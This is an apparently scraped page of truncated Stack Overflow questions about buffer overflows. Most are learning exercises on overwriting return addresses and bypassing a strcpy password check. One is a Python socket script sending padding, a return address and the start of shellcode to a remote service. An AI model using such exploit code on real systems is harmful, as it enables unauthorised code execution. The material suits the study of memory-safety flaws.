buffer-overflow

问题 I got a homework assignment asking me to invoke a function without explicitly calling it, using buffer overflow. The code is basically this: #include <stdio.h> #include <stdlib.h> void g() { printf("now inside g()!\n"); } void f() { printf("now inside f()!\n"); // can only modify this section // cant call g(), maybe use g (pointer to function) } int main (int argc, char *argv[]) { f(); return 0; } Though I'm not sure how to proceed. I thought about changing the return address for the program

问题 I was trying to do a buffer overflow (I'm using Linux) on a simple program that requires a password. Here's the program code: #include <stdio.h> #include <stdlib.h> #include <string.h> int check_authentication(char *password){ int auth_flag = 0; char password_buffer[16]; strcpy(password_buffer, password); if(strcmp(password_buffer, "pass1") == 0) auth_flag = 1; if(strcmp(password_buffer, "pass2") == 0) auth_flag = 1; return auth_flag; } int main(int argc, char **argv) { if(argc < 2){ printf("

问题 I'm trying to execute a very simple buffer overflow attack. I'm pretty much a newbie to this. So, if this question is stupid, please excuse me :-) The code: #include<stdio.h> #include<stdlib.h> int i, n; void confused(int i) { printf("**Who called me? Why am I here?? *** %x\n ", i); } void shell_call(char *c) { printf(" ***Now calling \"%s\" shell command *** \n", c); system(c); } void victim_func() { int a[4]; printf("Enter n: "); scanf("%d",&n); printf("~~~~~~~~~~~~~ values and address of n

问题 Here is an example in c: #include <stdio.h> #include <string.h> void bad() { printf("Oh shit really bad~!\r\n"); } void foo() { char overme[4] = "WOW"; *(int*)(overme+8) = (int)bad; } int main() { foo(); } 回答1: The fact that Python and PHP are interpreted like suggested by others isn't actually the point. The point is that almost all of the APIs and language semantics that they expose are heavily error-checked making it impossible to have exploitable undefined behavior. Even if you compile

问题 void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8;//why is it 8?? } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } The above demo is from here: http://insecure.org/stf/smashstack.html But it's not working here: D:\test>gcc -Wall -Wextra hw.cpp && a.exe hw.cpp: In function `void function(int, int, int)': hw.cpp:6: warning: unused variable 'buffer2' hw.cpp: At global scope: hw.cpp:4: warning: unused

问题 Okay, so I was teaching my girlfriend some c++, and she wrote a program that I thought wouldn't work, but it did. It accesses one more element in the array then there is (for instance, accessing array[5] for an array of size 5). Is this an instance of a buffer overflow? My thoughts on it are that it's writing to/accessing the memory directly after the array, is this correct? Basically my question here is..why does this work? #include <iostream> using namespace std; int main() { int size; cout

问题 I'm practicing some buffer-overflow techniques and I came across an odd issue with sending socked data. I have this two almost identical codes, except the fact that in Python3 code, I changed the sock.send to encode the string (in Python2 you don't need that) Python2 code: import socket,sys sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect ((sys.argv[1], 10000)) buffer = "A"*268 buffer += "\x70\xfb\x22\x00" #PAYLOAD: buffer += ("\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41

问题 Buffer overflows seem to be one of the biggest causes of security vulnerabilities. I rarely program in C/C++ (only for certain coursework), so I may be missing something, but I don't understand why people continue to use data structures that allow overflows. Why don't all data structures throw an exception when full? Seems like this simple solution would greatly enhance software security. 回答1: Ignorance A large percentage of programmers (in my perhaps unfairly negative skewed view of the

问题 I've got myself in a pickle on this project I'm working on. My main objective is to stitch two webcam feeds together and do object detection on them - bounding boxes, etc...the standard stuff. I can't rid myself of buffer overflows though - the somewhat simplified code below (for readability) compiles x64 and soon after I get a buffer overflow error and this in the console: "OpenCV Error: Assertion Failed (contour.checkVector(2) >= 0 && (contour.depth() == CV_32F || CV_32S) in unknown

问题 I'm running some benchmarks and some overflow the traceview buffer, I'm already using the max buffer size that I can (400MB). How can I get these data? (I need the hole benchmark to be traced, not only some smaller portions of the benchmark, each one in a different file) Is it possible to flush the buffer to a file when it is full? Is it possible to write everything directly in a file, instead of just when the trace stops? any other alternative? 来源： https://stackoverflow.com/questions